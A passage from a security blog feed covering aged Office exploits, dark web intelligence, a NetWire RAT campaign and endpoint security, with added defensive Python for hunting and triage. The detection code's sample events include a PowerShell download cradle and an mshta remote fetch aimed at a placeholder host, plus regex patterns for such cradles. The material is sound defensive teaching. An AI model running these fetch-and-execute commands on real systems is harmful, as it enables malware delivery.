The third and perhaps most likely reason for the continued use of these vulnerabilities is the sheer ease of generating documents that exploit them. Because Office documents are essential to the day-to-day operations of most target organizations, they are often not blocked by enterprise email filters. As a final bonus for threat actors, the exploits are also among the cheapest cybercriminals can buy.

X-Force’s dark web research of underground forums highlights multiple offerings of free document builders that leverage each of these vulnerabilities. Our team also identified free YouTube videos focused on each vulnerability, illustrating how an attacker can generate a document to exploit these issues.

Figure 2: YouTube videos detailing how to generate documents exploiting CVEs 2017-0199, 2017-11882 (Source: IBM X-Force)

Keep in mind that successful exploitation of older vulnerabilities is more likely on older, unpatched operating systems (OSs) and on legacy systems for which OS end-of-life means no new patches are even available. Such systems are typically found in organizations that cannot patch because of other constraints or priorities. There are many reasons an organization might defer patching, but that decision is never a good one in the long run.

What Can Companies Do With This Sort of Information?

Older vulnerabilities are clearly not going away any time soon, so organizations need to be prepared to defend against their attempted exploitation. IBM X-Force Incident Response and Intelligence Services (IRIS) has the following tips for organizations to better protect themselves:

  • Asset management is an ongoing process that should be top of mind for risk management. Part of this process is continually assessing risk to critical systems and considering the consequences of not patching them. Reassess the risks and consider patching and updating operating systems as soon as possible. Reality check: Windows 7’s end-of-life took place on January 14, 2020. Is your organization ready to move to an updated OS?
  • On the application level, ensure that patches for productivity suites β€” especially Microsoft software β€” are applied as soon as they become available.
  • Monitor the organization’s environment for PowerShell callouts that may be attempting to download and execute malicious payloads, and for Office processes (or EQNEDT32.EXE) spawning script hosts such as mshta.exe, cmd.exe or powershell.exe, which is the process chain these exploits produce.
  • Continue user education on the risks of opening attachments from unknown sources, as vulnerabilities like these do not require any user interaction beyond opening to cause harm.
  • Scope and engage in a vulnerability management program to determine if older vulnerabilities are exposing your environment to exploitation by an attacker.
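The monitoring recommendation above can be turned into a concrete hunt over process-creation telemetry. The following is an added example, not IBM X-Force detection content, that applies three rules to Sysmon-style events: an Office process spawning a script host (the CVE-2017-0199 chain), EQNEDT32.EXE spawning anything at all (the CVE-2017-11882 chain, since Equation Editor has no legitimate reason to create child processes), and a PowerShell or mshta command line that contains a download cradle, after decoding any `-EncodedCommand` payload so keywords hidden in base64 are visible. The JSON events, the field names and the 203.0.113.0/24 address are constructed; real field names depend on your EDR or SIEM.

```python
"""Hunt process-creation telemetry for the post-exploitation chain that
CVE-2017-0199 and CVE-2017-11882 documents produce.

Added example, not IBM X-Force detection content. The events below are
constructed in a Sysmon-Event-1-like shape (JSON lines); field names are an
assumption and 203.0.113.0/24 is a documentation range, not a real C2.
"""
import base64
import json
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "wordpad.exe", "outlook.exe"}
EQUATION_EDITOR = "eqnedt32.exe"
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe"}
CRADLE_RE = re.compile(
    r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b|"
    r"invoke-expression|\biex\b|start-bitstransfer|https?://)", re.IGNORECASE)
# PowerShell accepts abbreviated switch names; these are the spellings seen in malspam.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) so the cradle
    regex can see keywords that were hidden in base64."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} [decoded: {decoded}]"


def classify(event: dict) -> list:
    """Return (rule, detail) tuples that fire for one process-creation event."""
    child = image_name(event["Image"])
    parent = image_name(event["ParentImage"])
    cmd = expand_encoded(event.get("CommandLine", ""))
    hits = []
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        hits.append(("office_spawns_script_host", f"{parent} -> {child}"))
    if parent == EQUATION_EDITOR:
        hits.append(("equation_editor_child", f"{parent} -> {child}"))   # never legitimate
    if child in {"powershell.exe", "pwsh.exe", "mshta.exe"} and CRADLE_RE.search(cmd):
        hits.append(("download_cradle", cmd[:160]))
    return hits


def hunt(lines) -> dict:
    """Parse JSON lines and return {ProcessId: [hits]} for events that alert."""
    alerts = {}
    for line in lines:
        if not line.strip():
            continue
        event = json.loads(line)
        hits = classify(event)
        if hits:
            alerts[event["ProcessId"]] = hits
    return alerts


def _encode_ps(script: str) -> str:
    """Encode a script the way `powershell -EncodedCommand` expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
EQNEDT = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"

# Constructed events: one clean Word launch, the two exploit chains, and a
# benign print-helper child of Word that must not alert.
SAMPLE_EVENTS = [json.dumps(e) for e in [
    {"ProcessId": 4400, "Image": OFFICE, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": '"WINWORD.EXE" /n Invoice.rtf'},
    {"ProcessId": 4412, "Image": r"C:\Windows\System32\mshta.exe", "ParentImage": OFFICE,
     "CommandLine": "mshta.exe http://203.0.113.10/template.hta"},
    {"ProcessId": 5120, "Image": r"C:\Windows\System32\cmd.exe", "ParentImage": EQNEDT,
     "CommandLine": "cmd.exe /c powershell -w hidden -enc " + _encode_ps(CRADLE)},
    {"ProcessId": 5130, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -w hidden -enc " + _encode_ps(CRADLE)},
    {"ProcessId": 6000, "Image": r"C:\Windows\splwow64.exe", "ParentImage": OFFICE,
     "CommandLine": "splwow64.exe 12288"},
]]


def run_sample() -> dict:
    return hunt(SAMPLE_EVENTS)


if __name__ == "__main__":
    for pid, hits in run_sample().items():
        print(pid, hits)
```

The parent/child rules are cheap and have a low false-positive rate in most estates; the cradle rule is noisier and benefits from an allow list for administrative scripts, but decoding the encoded command first is what keeps it from being trivially bypassed.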


The post What’s Old Is New, What’s New Is Old: Aged Vulnerabilities Still in Use in Attacks Today appeared first on Security Intelligence.

The Case for Integrating Dark Web Intelligence Into Your Daily Operations

30 January 2020 at 09:00

Some of the best intelligence an operator or decision-maker can obtain comes straight from the belly of the beast. That’s why dark web intelligence can be incredibly valuable to your security operations center (SOC). By leveraging this critical information, operators can gain a better understanding of the tactics, techniques and procedures (TTPs) employed by threat actors. With that knowledge in hand, decision-makers can better position themselves to protect their organizations.

This is in line with the classic teachings from Sun Tzu about knowing your enemy, and the entire passage containing that advice is particularly relevant to cybersecurity:

β€œIf you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know neither the enemy nor yourself, you will succumb in every battle.”

Let’s translate the middle section of this passage into colloquial cybersecurity talk: You can have the best security operations center in the world with outstanding cyber hygiene, but if you aren’t feeding it the right information, you may suffer defeats β€” and much of that information comes from dark web intelligence.

Completing Your Threat Intelligence Picture

To be candid, if you’re not looking at the dark web, there is a big gap in your security posture. Why? Because that’s where a lot of serious action happens. To paraphrase Sir Winston Churchill, the greatest defense against a cyber menace is to attack the enemy’s operations as near as possible to the point of departure.

Now, this is not a call to get too wrapped up in the dark web. Rather, a solid approach would be to go where the nefarious acts are being discussed and planned so you can take the appropriate proactive steps to prevent an attack on your assets.

The first step is to ensure that you have a basic understanding of the dark web. Most dark web services are reached over anonymity networks such as Tor and I2P (the Invisible Internet Project), overlay networks that route traffic through layers of relays so that neither the client’s nor the service’s location is exposed. This is only a basic illustration of dark web communications, but if your security operations center aims to improve its dark web intelligence capabilities, you must be able to explain the dark web in these simple terms for two reasons:

  1. You cannot access these sites as you would any other website.
  2. You’re going to have to warn your superiors what you’re up to. The dark web is an unsavory place, full of illegal content. Your decision-makers need to know what will be happening with their assets at a high level, which makes it vitally important to speak their language.

And this part is critical: If you want to get the most out of dark web intelligence, you may have to put on a mask and appear to β€œbe one of the bad guys.” You will need to explain to your decision-makers why full-time staff might have to spend entire days as someone else. This is necessary because when you start searching for granular details related to your organization, you may have to secure the trust of malicious actors to gain entry into their circles. That’s where the truly rich intelligence is.

This could involve transacting in bitcoin or other cryptocurrencies, stumbling upon things the average person would rather not see, deciphering coded language and broken language, and all the usual challenges of putting on an act, all so you can become a trusted persona. Like any other relationship you develop in life, this doesn’t happen overnight.

Of course, there are organizations out there that can provide their own β€œpersonas” for a fee and do the work for you. Using these services can be advantageous for small and medium businesses that may not have the resources to do all of this on their own. But the bigger your enterprise is, the more likely it becomes that you will want these capabilities in-house. In general, it’s also a characteristic of good operational security to be able to do this in-house.

Determining What Intelligence You Need

One of the most difficult challenges you will face when you decide to integrate dark web intelligence into your daily operations is figuring out what intelligence could help your organization. A good start is to cluster the information you might collect into groups. Here are some primer questions you can use to develop these groups:

  • What applies to the cybersecurity world in general?
  • What applies to your industry?
  • What applies to your organization?
  • What applies to your people?

For the first question, there are plenty of service providers who make it their business to scour the dark web and collect such information. This is an area where it may make more sense to rely on these service providers and integrate their knowledge feeds into existing ones within your security operations center. With the assistance of artificial intelligence (AI) to manage and make sense of all these data points, you can certainly create a good defensive perimeter and take remediation steps if you identify gaps in your network.

It’s the second, third and fourth clusters that may require some tailoring and additional resources. Certain service providers can provide industry-specific dark web intelligence β€” and you would be wise to integrate that into your workflow β€” but at the levels of your organization and its people, you will need to do the work on your own. Effectively, you would be doing human intelligence work on the dark web.

Why Human Operators Will Always Be Needed

No matter how far technological protections advance, when places like the dark web exist, there will always be the human element to worry about. We’re not yet at the stage where machines are deciding what to target β€” it’s still humans who make those decisions.

Therefore, having top-level, industrywide information feeds can be great and even necessary, but it may not be enough. You need to get into the weeds here because when malicious actors move on a specific target, that organization has to play a large role in protecting itself with specific threat intelligence. A key component of ensuring protections are in place is knowing what people are saying about you, even on the dark web.

As Sun Tzu said: β€œIf you know the enemy and know yourself, you need not fear the result of a hundred battles.” There’s a lot of wisdom in that, even if it was said some 2,500 years ago.

The post The Case for Integrating Dark Web Intelligence Into Your Daily Operations appeared first on Security Intelligence.

New NetWire RAT Campaigns Use IMG Attachments to Deliver Malware Targeting Enterprise Users

21 January 2020 at 06:00

IBM X-Force researchers have discovered a new campaign targeting organizations with fake business emails that deliver NetWire remote-access Trojan (RAT) variants.

The RAT is hidden inside an IMG file, a file extension used by disk imaging software. Because many attachment types are automatically blocked by email security controls, spammers carefully choose the file extensions they use in malspam and rotate the container formats they conceal malware in. X-Force’s analysis shows that the emails delivering the NetWire RAT in this campaign were sent from a small number of unique senders purportedly located in Germany.

The NetWire RAT is a malicious tool that emerged in the wild in 2012. This multi-platform malware has since undergone various upgrade cycles and was detected in different types of attacks that range from cybercrime endeavors by Nigerian scammers to advanced persistent threat (APT) attacks. The NetWire RAT is a commercial offering that can be easily purchased on Dark Web markets, which means that it can be used by just about any threat actor.

This isn’t the first time NetWire has been delivered in fake business communications. In a previous campaign launched in September 2019, its operators sent booby-trapped files posing as PDF commercial invoices. The actual file was an executable that installed the NetWire RAT as soon as it was clicked.

Extracting a RAT

In one of the samples we examined, an IMG file named β€œSales_Quotation_SQUO00001760.img.” served as the container in which the attackers packaged the malware until the recipient opened the file. Once opened, it yielded an executable: the NetWire RAT.
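A disk image is an unusual thing to receive as a business attachment, and the container format is easy to recognize independently of whatever extension the sender chose. The following is an added example, not X-Force code, of an attachment triage step a mail gateway could run: it resolves the real extension (stripping the trailing dot and double-extension tricks), checks for an ISO 9660 or UDF volume descriptor at the position the format defines, and scans the image for any embedded PE executable by validating the MZ header's pointer to the PE signature. The sample image is constructed (a bare descriptor and a PE stub), not a real disk image or real malware; the filename reuses the pattern from the campaign for illustration only.

```python
"""Triage an e-mail attachment that arrives as a disk image (.img/.iso), the
container this NetWire campaign used to slip an executable past filters that
key on attachment extension alone.

Added example, not X-Force code. The sample image below is constructed.
"""
import re
import struct

SECTOR = 2048
IMAGE_EXTENSIONS = {".img", ".iso", ".vhd", ".vhdx", ".dmg", ".udf"}


def attachment_extension(filename: str) -> str:
    """Last meaningful extension. Trailing dots/spaces (a trick against naive
    extension checks) are stripped first, and 'invoice.pdf.img' resolves to .img."""
    name = filename.rstrip(". ").lower()
    return name[name.rfind("."):] if "." in name else ""


def is_iso_image(data: bytes) -> bool:
    """ISO 9660 volume descriptors start at sector 16 with a type byte followed
    by 'CD001'; UDF images put 'BEA01'/'NSR02'/'NSR03' in the same region."""
    for lba in range(16, 20):
        off = lba * SECTOR
        if data[off + 1:off + 6] in (b"CD001", b"BEA01", b"NSR02", b"NSR03"):
            return True
    return False


def find_pe_offsets(data: bytes) -> list:
    """Offsets of every embedded PE image: an 'MZ' whose e_lfanew field (at
    +0x3C) points at a 'PE\\0\\0' signature inside the buffer."""
    hits = []
    for m in re.finditer(rb"MZ", data):
        start = m.start()
        if start + 0x40 > len(data):
            break
        (e_lfanew,) = struct.unpack_from("<I", data, start + 0x3C)
        pe = start + e_lfanew
        if 0 < e_lfanew < 0x1000 and data[pe:pe + 4] == b"PE\x00\x00":
            hits.append(start)
    return hits


def triage_attachment(filename: str, data: bytes) -> dict:
    ext = attachment_extension(filename)
    result = {
        "extension": ext,
        "looks_like_disk_image": is_iso_image(data) or ext in IMAGE_EXTENSIONS,
        "embedded_pe_offsets": find_pe_offsets(data),
        # crude: counts any inner dot, so tune against your own naming conventions
        "double_extension": filename.rstrip(". ").lower().count(".") > 1,
    }
    if result["looks_like_disk_image"] and result["embedded_pe_offsets"]:
        result["verdict"] = "quarantine"          # executable smuggled inside a mountable image
    elif result["looks_like_disk_image"]:
        result["verdict"] = "hold_for_review"     # disk images are rarely legitimate business mail
    else:
        result["verdict"] = "pass_to_next_filter"
    return result


def build_sample_image() -> bytes:
    """Constructed ISO-like blob: zeros up to LBA 16, a primary volume
    descriptor header, then a bare PE stub at LBA 20. Not a real image."""
    img = bytearray(SECTOR * 24)
    pvd = 16 * SECTOR
    img[pvd] = 1                                   # type 1 = primary volume descriptor
    img[pvd + 1:pvd + 6] = b"CD001"
    img[pvd + 6] = 1                               # descriptor version
    stub = bytearray(0x100)
    stub[0:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x80)       # e_lfanew -> PE header at +0x80
    stub[0x80:0x84] = b"PE\x00\x00"
    img[20 * SECTOR:20 * SECTOR + len(stub)] = stub
    return bytes(img)


SAMPLE_NAME = "Sales_Quotation_SQUO00001760.img."   # pattern from the campaign, constructed file

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_NAME, build_sample_image()))
```

Checking the volume descriptor rather than trusting the extension matters because the same payload shows up as .iso, .img or .udf depending on the spam run; checking for a PE inside the image is what separates the rare legitimate image from a smuggled dropper.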

Immediately after this initial execution, the malware established persistence via a scheduled task, a tactic common among malware developers. The scheduled task lets the malware check that it is still active and relaunch itself on a recurring basis.

Additionally, the malware creates registry keys to store the command-and-control (C&C) server’s IP address and other data it needs to operate on the infected device. Communication with the C&C server takes place over TCP port 3012.
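The two behaviours just described, a self-relaunching scheduled task and a fixed outbound port, are also the cheapest things to hunt for on a host suspected of running this sample. The following is an added example, not X-Force code: it reads the CSV that `schtasks /query /fo csv /v` produces and flags tasks that re-trigger on their own while pointing at a binary under a user-writable directory, and it filters a netstat-style connection list for established sessions to TCP 3012. Both inputs are constructed; the paths, task names and 203.0.113.0/24 address are placeholders, not indicators from the campaign.

```python
"""Hunt for the persistence this NetWire sample sets up: a scheduled task that
relaunches a binary dropped under a user-writable path, and the outbound
connection it then makes (the article's sample used TCP 3012).

Added example, not X-Force code. Input is the CSV shape of
`schtasks /query /fo csv /v` and a `netstat -ano`-style listing; both samples
are constructed.
"""
import csv
import io
import re

USER_WRITABLE = re.compile(
    r"\\(appdata|local settings|temp|tmp|programdata|users\\public|downloads)\\", re.IGNORECASE)
SUSPECT_PORTS = {3012}   # from the article's analysis of this sample


def suspicious_tasks(schtasks_csv: str) -> list:
    """(task name, command) for tasks whose 'Task To Run' lives in a user-writable
    directory and which re-trigger on their own (logon, startup or an interval)."""
    findings = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        command = row.get("Task To Run", "")
        trigger = (row.get("Schedule Type", "") + " " + row.get("Repeat: Every", "")).lower()
        recurring = any(k in trigger for k in ("logon", "startup", "minute", "hour"))
        if USER_WRITABLE.search(command) and recurring:
            findings.append((row["TaskName"], command))
    return findings


def suspicious_connections(netstat_lines) -> list:
    """(remote host, port, pid) for established TCP sessions to a C&C port."""
    out = []
    for line in netstat_lines:
        parts = line.split()
        if len(parts) < 4 or parts[0] != "TCP":
            continue
        remote, state = parts[2], parts[3]
        host, _, port = remote.rpartition(":")
        if state == "ESTABLISHED" and port.isdigit() and int(port) in SUSPECT_PORTS:
            out.append((host, int(port), parts[4] if len(parts) > 4 else "?"))
    return out


# Constructed sample input (not a real host's task list or connection table).
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type","Repeat: Every"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","Weekly","N/A"
"WS01","\Updater","C:\Users\jdoe\AppData\Roaming\Updater\host.exe","At logon time","N/A"
"WS01","\Sync","C:\Users\jdoe\AppData\Local\Temp\sync.exe","One Time Only","0 Hour(s), 5 Minute(s)"
'''
SAMPLE_NETSTAT = [
    "  TCP    10.0.0.15:49812    203.0.113.45:3012    ESTABLISHED     4412",
    "  TCP    10.0.0.15:49901    198.51.100.7:443     ESTABLISHED     2200",
    "  TCP    10.0.0.15:49950    203.0.113.45:3012    TIME_WAIT       0",
    "  UDP    0.0.0.0:5353       *:*                                  1120",
]

if __name__ == "__main__":
    print(suspicious_tasks(SAMPLE_SCHTASKS_CSV))
    print(suspicious_connections(SAMPLE_NETSTAT))
```

A fixed port is a weak indicator on its own (the operators can change it per build), so the task check, which keys on behaviour rather than on a constant, is the one to keep in a standing hunt.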

What’s the NetWire RAT Up To?

Since this malware can be used by any group with any motivation, attribution is rather futile. What we did want to figure out was what the NetWire RAT campaign we detected was after this time.

Looking at some unencrypted strings found in memory, we identified a series of strings written in a foreign language, which appears to be Indonesian. Below is a screenshot from Google Translate showing a rough translation of the various identified strings. Many of these terms either relate to a login prompt, payment options, donations or the term β€œafterlife savings”:

Figure 1: Translated malware strings from recent NetWire RAT campaign

This term may relate to permanent life insurance for retirement purposes offered in some parts of the world.

From the overall look of it, this campaign is financially motivated and most likely being carried out by local fraudsters looking to rob account owners in various ways. Although we have not seen the complete post-infection flow, it may be followed up by a 419-type scam, or might also include social engineering or phishing pages to lure the victim to enter their banking credentials and enable the attackers to take over their accounts.

Recent campaigns in the wild show that the NetWire RAT is not the only malware being delivered via disk imaging file extensions. This was somewhat of a trend in late 2019, likely because the same spamming operators were distributing RATs for different threat actors.

Commercial Malware Abounds

Oftentimes, as security professionals, we hear about the larger and more impactful data breaches, ransomware attacks, and destructive campaigns, which are often carried out by sophisticated cybercrime gangs. But while most financially motivated cybercrime is the work of larger, organized crime groups, smaller factions are still very much in business, and they too target businesses to compromise bank accounts and steal money by using commercially available malware year-round.

Indicators of compromise (IoCs) and other information on how to protect networks from the NetWire RAT can be found on IBM X-Force Exchange.

The post New NetWire RAT Campaigns Use IMG Attachments to Deliver Malware Targeting Enterprise Users appeared first on Security Intelligence.

What Is the Biggest Challenge Facing Endpoint Security? Hint: It’s Not Malware

2 January 2020 at 06:00

The need to achieve responsible enterprise security has taken center stage in enterprise IT management in recent years, precipitated by a deluge of public data breaches that damaged company reputations. However, lacking information on the most critical modern attack vectors, many organizations continue to rely on traditional virus scanning tools as their sole method of enabling endpoint security.

Many business professionals seem to cling to a common misconception that the implementation of a malware protection tool provides blanket protection against all potential security risks. The broad availability of free scanning tools and Windows’ native Defender software has lulled individuals who are not particularly risk-conscious into a false sense of security when it comes to protecting their IT resources.

To be clear, it is certainly true that scanning and remediation tools for malware β€” including viruses, Trojans, ransomware and adware β€” continue to be critical components of any security arsenal. According to Enterprise Management Associates (EMA) research, 73 percent of surveyed organizations indicated they have been affected by a malware attack, and only 58 percent reported a high level of confidence that they can detect a malware incident before it causes a business-impacting event.

These challenges are only accelerating due to a new generation of advanced malware attacks that are designed to target specific environments or conditions and are more resistant to removal or cleanup. However, it is important to recognize that these threats represent only a portion of the total risks posed by the use of endpoint devices in modern business environments.


Modern Endpoint Security Attack Vectors

Beyond the threat of malware infection, the broad reliance on distributed endpoint devices β€” including desktops, laptops, tablets, smartphones and wearables β€” poses a number of challenges to enterprise security assuredness. In traditional environments, endpoint devices (primarily desktops) and the applications and data they utilized were kept contained on controlled business networks.

Today, however, critical business IT services are distributed across numerous public and private cloud, web, and server-hosting environments. Additionally, the β€œmobile revolution,” which began a decade ago, introduced more portable endpoint devices, allowing users to access business IT services from any location at any time. The consequence of these foundational changes to IT service delivery is that there is no longer a secure perimeter within which business devices, applications and data can be protected. Instead, all IT services must be considered continuously at risk.

Unfortunately, many bad actors are far ahead of the curve in figuring out how to exploit a world of interconnected and poorly secured software and devices. Cryptojacking is a prime example of this. It occurred to some resourceful individuals that it would be much cheaper and easier to secretly leverage the processing power of millions of end-user devices by embedding code in common websites to perform free cryptocurrency mining activities, rather than to purchase and manage a dedicated server farm for this purpose.

As a result, the performance of business devices and, by extension, the productivity of business workers are being diminished to line the pockets of clandestine entrepreneurs. Additionally, the inherent portability of the most commonly used endpoint devices (tablets and smartphones) further reduces their security. EMA research indicated that one out of every eight mobile devices and one out of every 20 laptops containing business data ends up lost or stolen.

These are only two examples of the rapidly evolving endpoint security challenges that plague enterprise operations teams, and the trend is expected to accelerate as attackers leverage intelligence technologies such as machine learning to identify new weaknesses they can exploit.

The Biggest Threat to Endpoint Security

EMA recently noted that the most frequent consequence of a security breach is not a malware infection, but compromised business data. We live in an age when information is a commodity that can be bought and sold through both legal markets and shadowy outlets. The latter, of course, is the greater concern with critical data β€” such as user access credentials, Social Security numbers, bank account information and other sensitive information β€” regularly being auctioned on the dark web. Cyberattacks are no longer designed just to be a nuisance; they are the cornerstone of a high revenue-generating industry.

There are three principal methods through which data is compromised on an endpoint:

  1. The first is through the use of invasive software, such as hidden code in applications and websites that collect and distribute data to remote systems without the knowledge of the users.
  2. The second involves manipulating users into unwittingly granting nefarious actors access to devices and IT resources. This is most frequently accomplished with phishing schemes that rely on psychological inventiveness rather than technological proficiency.
  3. The final method for compromising data on endpoint devices occurs when the user distributes the information themselves in an unsecure manner.

A Responsible Approach to Endpoint Security

Antivirus and other malware protection solutions can certainly help protect endpoint devices from related attacks, but they do very little natively to prevent data loss from other attack vectors. To responsibly ensure endpoint devices can securely perform business tasks, organizations must adopt a multifaceted approach to security that continuously monitors for inappropriate device activities and effectively controls access to enterprise data and resources.

To enable holistic visibility, configuration, status and contextual information should be collected on devices, processes and network activities. Intelligence technologies, such as analytics, language processing and machine learning, should be applied to collected details so that any potential security risks can be rapidly identified, and policy-based automated responses can be immediately implemented.

Of course, enterprise data is not at risk at all if it is never removed from secured locations in the first place. This can be accomplished with resource isolation technologies such as containerization, app wrapping, virtualization and browser isolation. Data access and distribution controls are also enhanced by strong identity and access management (IAM) capabilities. IAM platforms that are risk-based and governed by policy controls provide a strong first line of defense in any security implementation, particularly if they holistically leverage device information collected by endpoint and security management tools, together with common intelligence technologies, to accurately determine the risk associated with allowing an access event to occur.
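What a "risk-based, policy-governed" access decision looks like in practice is easier to see in code than in prose. The following is an added example, not a product's policy engine and not code from the original article: it takes the device posture a UEM platform would report (enrollment, patch age, disk encryption, malware state), combines it with login context (an impossible-travel check between the previous and current login, computed with the haversine formula) and the sensitivity of the requested resource, and returns allow, step-up MFA or deny. The weights, thresholds, coordinates and timestamps are constructed assumptions that a real deployment would tune.

```python
"""Risk-based access decision: device posture from endpoint management plus
login context, scored against the sensitivity of the requested resource.

Added example, not a vendor's policy engine. Weights, thresholds and the
sample requests are constructed assumptions.
"""
from __future__ import annotations

from dataclasses import dataclass
from datetime import datetime, timedelta, timezone
from math import asin, cos, radians, sin, sqrt


@dataclass
class Device:
    managed: bool            # enrolled in UEM
    patch_age_days: int      # days since the last OS/security update
    disk_encrypted: bool
    malware_detected: bool


@dataclass
class Login:
    user: str
    when: datetime
    lat: float
    lon: float


def km_between(a: Login, b: Login) -> float:
    """Great-circle distance (haversine) between two login locations."""
    lat1, lon1, lat2, lon2 = map(radians, (a.lat, a.lon, b.lat, b.lon))
    h = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(h))


def impossible_travel(prev: Login, cur: Login, max_kmh: float = 900.0) -> bool:
    """True if reaching the new location would need more than airliner speed."""
    hours = (cur.when - prev.when).total_seconds() / 3600
    if hours <= 0:
        return True
    return km_between(prev, cur) / hours > max_kmh


def risk_score(device: Device, prev: Login | None, cur: Login, sensitivity: int) -> int:
    """sensitivity: 1 = public ... 4 = crown jewels. Higher score = riskier."""
    score = 0
    if device.malware_detected:
        score += 100                          # on its own crosses the deny line
    if not device.managed:
        score += 40
    if device.patch_age_days > 30:
        score += 20
    if not device.disk_encrypted:
        score += 15
    if prev is not None and impossible_travel(prev, cur):
        score += 50
    score += 10 * max(0, sensitivity - 1)
    return score


def decide(device: Device, prev: Login | None, cur: Login, sensitivity: int) -> str:
    score = risk_score(device, prev, cur, sensitivity)
    if score >= 90:
        return "deny"
    if score >= 30:
        return "step_up_mfa"
    return "allow"


# Constructed scenarios: timestamps and coordinates are illustrative.
NOW = datetime(2020, 1, 2, 9, 0, tzinfo=timezone.utc)
PREV_NY = Login("j.doe", NOW - timedelta(hours=1), 40.7128, -74.0060)   # New York, an hour ago
CUR_NY = Login("j.doe", NOW, 40.7306, -73.9352)                          # still in New York
CUR_SG = Login("j.doe", NOW, 1.3521, 103.8198)                           # Singapore, one hour later


def scenario_managed_office() -> str:
    return decide(Device(True, 5, True, False), PREV_NY, CUR_NY, 2)


def scenario_unmanaged_new_device() -> str:
    return decide(Device(False, 0, False, False), None, CUR_NY, 2)


def scenario_impossible_travel() -> str:
    return decide(Device(True, 3, True, False), PREV_NY, CUR_SG, 3)


def scenario_infected_device() -> str:
    return decide(Device(True, 3, True, True), PREV_NY, CUR_NY, 1)


if __name__ == "__main__":
    for fn in (scenario_managed_office, scenario_unmanaged_new_device,
               scenario_impossible_travel, scenario_infected_device):
        print(f"{fn.__name__:32} {fn()}")
```

The design point is that no single signal other than active malware is decisive: an unmanaged device or an implausible location each push the request into a step-up challenge rather than an outright block, which keeps the control usable while still denying the combinations that should never be allowed.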

Unified endpoint management (UEM) solutions designed to support all endpoints across an entire IT ecosystem offer the optimal platform from which to manage a diverse range of security processes. Comprehensive UEM solutions centrally support capabilities for data collection, reporting and alarming, data analysis, and automated response that are the hallmark of a responsible endpoint security approach. Solutions in this field are greatly advantaged if they can extend their security management capabilities through direct integrations with related platforms or by enabling integrations with the use of an API.

Effective endpoint security management requires a broad spectrum of key functionality that goes far beyond just malware detection, but with the right resources in place, organizations can ensure the secure utilization of enterprise IT services without unnecessarily limiting workforce productivity.


The post What Is the Biggest Challenge Facing Endpoint Security? Hint: It’s Not Malware appeared first on Security Intelligence.

Weekly Security News Roundup: Exposed Credit Card Details Abused Within 2 Hours

23 December 2019 at 09:00

Last week in security news, a researcher found that malicious actors had abused the details of a test credit card just two hours after he posted the information online. The security community also learned of a survey in which three-quarters of respondents said that they had required a password reset after forgetting one of their personal passwords in the previous three months. Finally, researchers tracked several new malware samples along with a now-fixed WhatsApp vulnerability.

Top Story of the Week: The Spread of Exposed Credit Card Data

David Greenwood, a security researcher on the ThreatPipes team, wanted to find out how information posted online spreads throughout the internet and dark web. So he purchased an anonymous, prepaid Visa credit card and posted its full credentials on several paste sites. He then sat back and waited.

It took all of two hours for digital attackers to spring into action. They used bots and scripts to make small purchases from a well-known U.K. retailer with the card details.


Also in Security News

  • Poison Frog Backdoor Samples Discovered in Aftermath of OilRig Dump: After a group of actors dumped OilRig’s attack tools online, Kaspersky Labs decided to scan its archives for new and old malware samples. In the process, it discovered Poison Frog, a sloppily designed backdoor that masqueraded as the legitimate Cisco AnyConnect application at the time of discovery.
  • Most Users Required a Personal Password Reset in the Last Three Months: In a recent study, HYPR found that 78 percent of full-time workers in the U.S. required a password reset sometime in the last three months after forgetting a personal password. The rate was slightly lower for work-related reset requests at just over half (57 percent) of respondents.
  • Lazarus-Linked Dacls RAT Makes Waves by Targeting Linux Machines: Back in October, Netlab 360 came across a suspicious ELF file that shared certain characteristics with tooling employed by the Lazarus group. The discovery of this file, nicknamed Dacls, marked the first time that researchers detected a Lazarus-created threat capable of targeting Linux machines.
  • U.S., EU Users Caught in the Crosshairs of Zeppelin Ransomware: Blackberry Cylance spotted threat actors using the newly discovered Zeppelin ransomware to selectively target technology and healthcare organizations in the U.S. and the European Union. Further analysis helped determine Zeppelin to be a member of the VegaLocker ransomware family.
  • Dudell Malware Leveraged by Rancor Digital Espionage Group: Palo Alto Networks’ Unit 42 threat research team analyzed the recent attacks of Rancor, a digital espionage group that targeted at least one Cambodian government organization between December 2018 and January 2019. In the process, it discovered a new custom malware family it dubbed Dudell.
  • Vulnerability Allowed Threat Actor to Crash WhatsApp on Phones in Shared Group: In August 2019, Check Point Software discovered a bug that enabled a malicious actor to implement a WhatsApp crash-loop on the devices of users in a shared group. The security firm subsequently disclosed this vulnerability to WhatsApp, whose developers issued a fix in update 2.19.246.
